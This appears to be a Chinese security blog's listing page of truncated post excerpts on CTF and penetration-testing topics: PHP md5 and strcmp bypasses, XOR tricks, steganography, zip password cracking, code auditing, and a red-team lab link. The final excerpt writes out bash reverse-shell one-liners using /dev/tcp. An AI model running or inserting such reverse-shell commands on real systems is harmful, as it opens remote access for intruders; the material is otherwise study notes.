渗透攻击红队域渗透靶场-2(redteam.lab)
渗透攻击红队域渗透靶场-2(redteam.lab)
|
0 评论
靶场下载链接链接: https://pan.baidu.com/s/1zRhkpk-GBltPftY
php md5漏洞
php md5漏洞
|
PHP |
0 评论
php处理0e开头md5时的hash字符串漏洞<?phprequire_once "flag.php";if (!isset($_GET['user']) && !isset($_GET['pass'])) { header("Locatio
php异或
php异或
|
PHP |
0 评论
php异或简介1、异或的符号是,是一种运算符11=010=101=10^0=0异或脚本<?phpfor($i=128;$i<255;$i++){echo sprintf("%s^%s",urlencode(chr($i)),urlencode(chr(255))).&
strcmp漏洞
strcmp漏洞
|
PHP |
0 评论
strcmp比较字符串函数参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。可知,传入的期望类型是字符串类型的数据,但是如果我们传入非字符串类型的数据的时候,这个函数将会
图片隐写
图片隐写
|
杂项 |
0 评论
文件类型识别方法方法一 fileLinux下file命令file 文件名方法二 文件头类型Windows下通过winhex查看文件头字段识别文件类型文件分离操作方法一: Linux下使用Binwalk工具进行文件的分析和分离。分析文件:binwalk filename分离文件:binwalk -e
音频隐写
音频隐写
|
杂项 |
0 评论
音频隐写穿越时空的思念1、用Audacity打开音频,可以看到摩斯密码的声道在右边,所以关闭左耳声道2、导出声道为wav文件3、拖进kali使用morse2ascii解析文件得到flagmorse2ascii下载方式:apt-get install morse2ascii4、使用方法,先对音频单声道
爆破
爆破
|
0 评论
zip包爆破Fcrackzip简介存有机密数据的文件,经常会被其所有者加密压缩保存。而作为数据安全审计者,则应对加密文件进行弱口令检查,以确保数据安全性。fcrackzip是一款快速的ZIP压缩文件密码破解工具,其支持基于字典和爆破的两种工作模式,同时其内建了字符集和密码规则指定功能,免去了使用者提
php.ini配置
php.ini配置
|
WEB PHP |
0 评论
php代码审计php配置   register_globals简介该选项设置为on的情况下,会直接把用户GET、POST等方式提交上来的参数注册成全局变量并初始化值为参数对应的值版本<=4.2.3 设置为php_ini_all=5.3.0 被废弃=5.4 移除该项示例<?phpi
espcms审计
espcms审计
|
0 评论
系统信息arch #显示机器的处理器架构(1)uname -m #显示机器的处理器架构(2)uname -r #显示正在使用的内核版本dmidecode -q #显示硬件系统部件 - (SMBIOS / DMI)hdparm -i /dev/hda #罗列一个磁
反弹SHELL
反弹SHELL
|
0 评论
反弹BASH TCPbash -i >& /dev/tcp/127.0.0.1/8080 0>&1/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1exec 5<>/dev/tcp/